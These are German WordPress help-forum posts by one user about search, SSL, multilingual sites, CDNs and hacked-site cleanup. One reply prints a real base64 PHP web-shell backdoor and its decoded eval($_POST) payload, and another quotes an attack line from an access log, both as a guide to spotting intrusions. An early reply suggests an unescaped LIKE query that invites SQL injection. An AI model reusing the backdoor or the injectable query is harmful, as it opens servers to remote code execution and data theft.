Beiträge von r23


    Die Suchfunktion auf der Seite ist ja absolut Schrott und findet gar nichts. Ich habe sie nun behelfsweise mit dem Plugin WPSearch2 bissl verbessert, aber sie liefert immer noch nicht zufrieden stellende Ergebnisse.

    Ok - ich bastel auch ständig ... hüst... recht oft ... an der WP Suche. Allerdings bevorzuge ich auch die "Content" suche


    Die Suche allerdings, die ich im Adminbereich bei den Artikeln habe funktioniert Top und liefert die Ergebnisse exakt wie ich sie will. Einfach Titel durchsuchen und Suchergebnisse nach Datum (aktuellstes zuerst) ausgeben.

    Wenn man ein Datenfeld duchsuchen möchte , verwendet man

    PHP
    LIKE '%" . $sKeywords . "%'

    http://dev.mysql.com/doc/refman/5.1/de/


    Ich müsste ein ziemlich komplexes Script einbinden auf meinem Blog.

    Wo ist das Problem?

    Code
    <form id="form1" name="form1" method="post" action="pagerank.php?pagerank=2#rank">

    Dein Formular sendet zurzeit an

    pagerank.php

    bei der Absendung
    pagerank=2#rank

    mmh...

    das Formular kannst du einfach an dein Wordpress senden

    Code
    <form id="form1" name="form1" method="post" action="http://www.example.org/blog/index.php?pagerank=2#rank">
    PHP
    error_reporting(E_ALL);

    in einer Entwicklungsumgebung ja - in Wordpress nein.


    [COLOR=#000000][COLOR=#007700]
    [/COLOR][/COLOR]

    PHP
    include("../lib/DomainTools.php")
    PHP
    includes '/dein/pfad/zu/deiner/lib/DomainTools.php';

    und mit dem Plugin Exec-PHP von
    http://bluesome.net/post/2005/08/18/50/

    kannst du überall deinen PHP Code verwenden.

    Hilft dir dies weiter?

    ralf

    Hallo,

    eigentlich ist eine Änderung von
    ~/wp-includes/pluggable.php
    nicht nötig.

    Mit

    PHP
    if ( is_ssl() ) {

    wird geprüft ob eine SSL Verbindung vorhanden ist.

    Es gibt in WP nur 4 Stellen wo gravatar vorkommt

    Suchen nach: gravatar.com

    Zitat

    wp-includes\pluggable.php(1666): $host = 'https://secure.gravatar.com';
    wp-includes\pluggable.php(1669): $host = sprintf( "http://%d.gravatar.com", ( hexdec( $email_hash[0] ) % 2 ) );
    wp-includes\pluggable.php(1671): $host = 'http://0.gravatar.com';
    wp-includes\pluggable.php(1675): $default = "$host/avatar/ad516503a11cd5ca435acc9bb6523536?s={$size}"; // ad516503a11cd5ca435acc9bb6523536 == md5('unknown@gravatar.com')

    Es wurden 4 Vorkommen in 1 Datei(en) gefunden.

    Zahl in der Klammer ist die Zeile. Durchsucht wurde WP

    Massenhoster und Billig Anbieter als Provider schaffen es in der Regel immer leicht, dass die folgende Funktion bei Ihnen nicht funktioniert

    Wenn du bei 1und1 und Co bist - schreibe die Funktion so um, dass deine PHP Version eine SSL Verbindung erkennt.

    wp-includes/functions.php


    Oder suche dir besser einen Provider der unter SSL auf die Nachfrage nach
    $_SERVER['HTTPS'] ein on liefert.

    cu

    ralf


    Haut man es in den footer können unter Umständen Besucher "verloren" gehen, die die Seite zu schnell wieder wegklicken.

    <ironie on>
    So verlierst du sicher die User, die nicht auf Google warten möchten.
    <Ironie off>

    Ergo: Der Google Code gehört in die footer.php und irgendwelche Google Texte in die Datenschutzerklärung.

    cu

    ralf

    Hallo,


    Was ich benötige:
    1x Deutsches Wordpress
    1x Englisches Wordpress

    Was mir wichtig ist, ist das ich wirklich eine Trennung zwischen Deutsch und Englisch habe.

    Daher dachte ich mir das ich einfach 2 x Wordpress installiere.

    ja - würde ich auch so machen



    Die User sollen zwischen Deutsch und Englisch switchen können um auch so die jeweils anderen sachen lesen zu können oder gar in jeweils anderen Forum zu Posten oder Kommentare bei Blog Einträgen verfassen.

    Ich würde serverseitig auf die Spracheinstellungen im Browser regagieren und einen Link zur anderen Sprache anbieten.

    D.h. sollte der Besucher im Browser englisch als bevorzugte Spache gewählt haben - so liefert der Server den englischsprachigen Content
    aus.



    Dies würde aber für jeden user bedeuten das er sich 2x regestrieren muss.
    Und genau das ist mein Problem. Dies möchte ich umgehen.
    Ich möchte das jeder User, egal auf welxcher Seite (De/En) sein gleichen Account mit den gleichen Profil, Freunden etc. Pp. hat.

    Ich würde meine Installation so ändern, dass diese auf nur einen User-Datenbestand zugreift. Müsste rein aus dem Bauch rehct einfach gehen, da WP nur eine User DB verwendet und eine gerennte User-Klasse hat
    ~/wp-includes/user.php

    und diese verwendet, wie erwartet nur

    PHP
    $wpdb->users

    und

    PHP
    $wpdb->usermeta

    Ich hoffe, die Antwort hilft dir weiter

    ralf

    Macht das wpSEO das? Habs von der offiziellen Seite gekauft

    Ich kenne das Plugin NICHT. Meine Wordpress Installtionen verfügen aber alle über einen "Title".

    Bei dir steht über den Title

    Code
    <!-- Diese Seite wurde [URL="http://forum.wordpress-deutschland.org/lexikon/?do=showentry&item=SEO"]SEO[/URL]-optimiert von wpSEO ([URL]http://www.wpseo.de[/URL]) -->

    und in der nächsten Zeile ist der Title - Tag leer

    Code
    <title></title> 
    <meta name="description" [URL="http://forum.wordpress-deutschland.org/lexikon/?do=showentry&item=content"]content[/URL]="

    Du kannst sicherlich in der Konfiguration von deinem wpSEO die Ausgabe von deinen Title-tag vermutlich konfigurieren. tu dies.
    Wie dies geht sagt dir dein Verkäufer!

    viel glück

    ralf

    Validator geht gar nicht bei mir ! LOL

    Wenn wir annehmen, dass http://www.modulopfer.de/ deine Seite ist - so erhälst du als Hinweis:

    Zitat


    Sorry, I am unable to validate this document because on line 21 it contained one or more bytes that I cannot interpret as utf-8 (in other words, the bytes found are not valid values in the specified Character Encoding). Please check both the content of the file and the character encoding indication.
    The error was: utf8 "\x94" does not map to Unicode

    Sehen wir uns den Quelltext an:

    sehen wir, dass du ein UTF-8 Problem hast.

    Code
    <link rel=�shortcut icon� href=[URL="http://forum.wordpress-deutschland.org/view-source:http://www.modulopfer.de/%EF%BF%BD/favicon.ico%EF%BF%BD"]�/favicon.ico�[/URL] type=�image/x-icon� /> <link rel="shortcut icon" href="[URL="http://forum.wordpress-deutschland.org/view-source:http://www.modulopfer.de/favicon.ico"]http://www.modulopfer.de/favicon.ico[/URL]" />

    Du benötigst für deine Änderungen zu erst einmal sinnvolle Werkzeuge, die in deiner Umgebung Dateien in UTF-8 ohne BOM speichern.

    Z.B.
    Notepad ++
    http://notepad-plus-plus.org/


    Erlaube mir eine Anmerkung. Die Seite hat keinen Title... :sad:

    Code
    <!-- Diese Seite wurde SEO-optimiert von wpSEO (http://www.wpseo.de) --> <title></title> <meta name="description" content="

    Bevor du dich mit irgendetwas anderem beschäftigst - sorge dafür, dass
    deine Seite einen Title erhält. Wenn das Pluign wpSEO dir die Daten löschen
    sollte- prüfe die Einstellungen und wende dich telefonsich :x an den Verkäufer.


    cu

    ralf

    Hallo,

    Ich mache ja im Moment bei Selbständig im Netz im Blog Coaching mit und diese Woche war der Technik Check:

    http://www.selbstaendig-im-netz.de/2011/06/14/blo…/#comment-50141

    guter und informativer Artikel.


    Wo finde ich jemanden der die Fehler ausmerzen kann ? Und den Blog mach optimiert auf W3. Ich habe davon keine Ahnung und bin etwas überfordert.

    einige Tipps in dem Aritikel kannst du sicherlich ohne Dienstleiter selber umsetzen. Z.B. Umzug auf einen eigenen Server, Verkleinerung und Optimierung von Bildern.

    Bei den Werkzeugen wird dir in der Regel gesagt, was schief läuft oder nicht richtig ist.
    http://validator.w3.org/

    auch hier kann man einen großen Teil selber beseitigen. Und dann gibt es "Fehler" für die benötigt man dann Fachwissen - evtl. den genauen Fehler in einem WebDesinger Forum besprechen und so lernen. oder sich einen Dienstleister suchen, der die Fehler beseitigt.

    Z.b. über das Jobforum oder einfach eine PN senden.

    cu

    ralf


    193.105.210.172 - - [31/May/2011:10:03:26 +0200] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(böses));error HTTP/1.0" 404

    Selbstverständlich sollte man die Log-Files lesen können -

    Verwendest du ein is-human Wp Plugin? - nö - daher antwortet dein Dein Server auf den Angriff HTTP/1.0" 404

    Man kann sich selbstverständlich mit nicht vorhanden Problemen den Tag versauen.

    Frohe Pfingsten wünscht

    ralf

    Hallo..ich brauche ganz dringend Eure Hilfe..unser Webmaster von unserer Homepage ist abgesprungen

    Im JobForum könnt ihr euch einen neuen Webmaster suchen. Bis ihr einen neuen gefunden habt, besorgt euch Bücher, Anleitungen... oder besucht Schulungen.

    Und über Pfingsten könnt ihr eure Bilder neu bennen

    http://die-wolperdinger.com/wp-content/gal…ister%20205.jpg

    Verzichtet bitte in den Dateinamen auf Leerzeichen. Wenn die Datei einen gültigen Namen hat können externe Programme auch die Fotos darstellen.

    Viel Erfolg bei der Suche nach einem neuen Webmaster

    ralf


    und ich musste von der DB das back vom Februar laden ....

    Welche WP Version war dies?


    jetzt macht aber wordpress kein autoupdate sonder meint es ist aktuell wegen den dateien scheinbar......

    welche Version sollte ein "autoupdate" machen - und was ist ein "autoupdate"?



    gibt es eine möglichkeit die datenbank zu aktualisieren ohne das ich den inhalt usw löschen muss ???

    Rufe in deinem Browser /wp-admin/upgrade.php auf. Das sollte ungefähr so aussehen: http://www.example.org/wordpress/wp-admin/upgrade.php. Anmerkung: Der genaue Pfad hängt natürlich von deiner Installation ab.

    Zitiat aus
    der Wp Dokumenation auf dieser Seite.


    Hoffe die Antwort hilft weiter?

    ralf


    Ich bin mir rauchendem Kopf am Machen. Mal sehen, was rauskommt.

    In der - von mir genannten Exploit Datenbank kannst du sehen, wie ein Angriff auf deine Seite aussehen könnte.

    es sollte reichen, wenn du die Log-Files zum Angriff-Zeitpunkt dir durch suchst.

    Wenn du deine Dateien und Verzeichnisse nicht gelöscht hast (- keine gute Idee) suche nach neuen Dateien. Wer .htaccess Dateien erstellen konnte - kann auch Scripte erstellen.

    Php Scripte müssen in keinem Verzeichnis funktionieren in dem nur deine statischen Daten (java scripte, Flash Filme, Bilder, css) liegen. Schalte dort in diesen Verzeichnissen PHP aus.

    Suche in den PHP Scripten nach

    Code
    eval

    Um fremden code ausführen zu können, verwenden Script Angreifer
    in ihren Scripten in der Regel "eval" die Zeile sieht aus

    PHP
    eval(urldecode($_POST["main"]



    oder jetzt aus der Ralitätit

    PHP
    <?php eval(base64_decode("aWYoaXNzZXQoJF9HRVRbInBhcnQiXSkpIHsgIGlmKCRfR0VUWyJwYXJ0Il09PSJzZWMiKSAgZWNobyAicGFydGdvb2QiOyB9IGVsc2UgaWYoaXNzZXQoJF9QT1NUWyJnZ2ciXSkpIHsgICBpZigkX1BPU1RbImdnZyJdPT0xKSAgICAgICAgZWNobyAib2sxMSI7ICB9IGVsc2UgaWYoaXNzZXQoJF9QT1NUWyJtYWluIl0pKSB7ICBldmFsKHVybGRlY29kZSgkX1BPU1RbIm1haW4iXSkpOyAgICB9")); ?>

    dort steht

    PHP
    eval(if(isset($_GET["part"])) { if($_GET["part"]=="sec") echo "partgood"; } else if(isset($_POST["ggg"])) { if($_POST["ggg"]==1) echo "ok11"; } else if(isset($_POST["main"])) { eval(urldecode($_POST["main"])); }

    Erst wenn du die Sicherheistlüscke in den Log-Files und Script gefunden hast - kannst du diese schließen.
    evtl. hat dein Provider ein Problem und der Angriff erfolgte nicht über deine Anwendungen.

    Viel Glück

    ralf

    Upps "Wie realisiert man das ganze"?

    Ist doch total einfach? Für die Auflieferung habe ich mir eine Funktion meine_content_url geschrieben.

    PHP
    add_filter( 'the_content', 'meine_content_url' );

    diese schreibt bei der Auslieferung die gefunden URLs in "the_centent" aus Wordpress um.

    D.h. hier wird aus http://example.org/wp-content/plugins/ dann http://cdn1.domain.tld/

    Selbstverständlich schreibe ich auch die Links in "bloginfo_url" um.



    Es geht mir dabei weniger um besonders viele dynamische Daten, sondern eher um eine große Menge an Uploads, die an relativ kleine Server geschickt werden sollen. Damit ich langfristig mit einer eher schwachen Serverkonfiguration leben kann, ohne auf größere Pakete upgraden zu müssen.

    Wenn du einen kleinen Server hast -warum verwendest du dann nicht einfach

    Google’s Cloud kostenlos als CDN nutzen
    http://www.phpgangsta.de/googles-cloud-…-als-cdn-nutzen

    oder du verwendest
    http://infoblog.li/w3-total-cache…t-cdn-funktion/

    cu

    ralf


    ich habe folgendes Problem:
    Ich möchte ein Wordpress-Blog auf mehreren Servern "verteilt" hosten. Dabei sollen die hochgeladenen Dateien auf mehrere Server verteilt werden, optional auch die Datenbank.

    Beispiel:

    Code
    cdn1.domain.tld --> /wp-content/plugins/
    cdn2.domain.tld --> /wp-content/themes/
    cdn3.domain.tld --> /wp-content/uploads/
    cdn4.domain.tld --> /wp-content/uploads/
    cdn5.domain.tld --> /wp-content/uploads/

    ich verteile auf
    adresse a . '/wp-content/uploads/',
    adresse b. '/wp-content/gallery/',
    adresse c. . '/wp-content/themes/',
    adresse d. . '/wp-content/plugins/',

    und funktioniert super.


    Die hochgeladenen Medien sollen dynamisch/zufällig auf den Servern cdn3, 4 und 5 verteilt werden.

    ok...


    Das wäre erstmal mein erstes Problem,

    Und deine Frage lautet?


    später käme dann dazu, die MySQL-Datenbank auf mehrere Server zu verteilen (lösbar mit einer einfachen Round-Robin-Verteilung?!)

    Edit: Das Problem mit der MySQL-Datenbank werde ich mit HyperDB angehen. Bleibt also nur noch die Frage nach dem "mini-CDN".

    Warum verwendest du nicht
    http://www.mysql.de/products/cluster/


    Da du die uploads auf drei server verteilen möchtest - vermute ich, dass du viel mit dynamischen daten machst. schau dir mal Gearman an

    es ist ein System für die Verteilung von Arbeit auf andere Maschinen. Es sendet Funktionsaufrufe an für die Aufgabe besser geeignete Maschinen, sorgt für die parallele Arbeit an Aufgaben und den Lastausgleich vieler Funktionsaufrufe und sorgt sich um Funktionsaufrufe zwischen unterschiedlichen Programmiersprachen

    http://gearman.org/index.php

    Tipp für deine Datenbank geschichte
    http://www.oreilly.de/catalog/hpmysqlger/

    bei Paper C kannst diese anlesen
    http://blog.paperc.de/2010/02/oreill…her-auf-paperc/

    cu

    ralf


    Ich habe Joomla auf den Stand der Dinge gebracht [...]
    (Der größte Teil in einem Piwik-Verzeichnis, das ich einfach gelöscht habe.)

    http://www.exploit-db.com/

    Piwik hatte mal einen sehr bösen Fehler in fremden Quellen

    Open Flash Chart
    http://www.exploit-db.com/exploits/10532/

    In einigen Wordpress Pluigns wurde Open Flash Chart auch verwendet.

    In der o.g. Datenbank kannst du suchen, welche aktuellen Sicherheitslücken du evtl. noch auf deinem System hast.

    Hier die Liste von WP
    http://www.exploit-db.com/search/?action…ption=Wordpress

    Bei einigen WP Templates werden dynamisch wunderbare kleine Grafiken erzeugt. Die Funktion von einem "Entwickler" hat leider auch eine Sicherheitslücke. Anstelle Grafiken kann man damit auch andere Sachen auf dem Server wunderbar speichern. Solltest du soetwas verwenden, aktualisiere die Funktions Scripte vom "Entwickler"... die WebDesinger vom Template stören sich zurzeit nicht daran.


    Ich tippe auf eine Sicherheits-Lücke, die irgendwie mit Joomla zu tun hat – oder "hatte", wie ich hoffe. Mehr fällt mir heute nicht mehr ein. Mal sehen, was sich die nächsten Tage tut. Den "18 Uhr-Robotertermin" der letzten beiden Tage habe ich zumindest bereits überstanden.

    Wende dich an deinen Provider mit der Bitte, dass er auf den Server ein
    http://de.wikipedia.org/wiki/Rootkit

    prüft.


    Ich persönlich mag
    http://rkhunter.sourceforge.net/

    Hintergrundwissen
    http://www.heise.de/security/artik…ren-270198.html

    Viel Glück

    ralf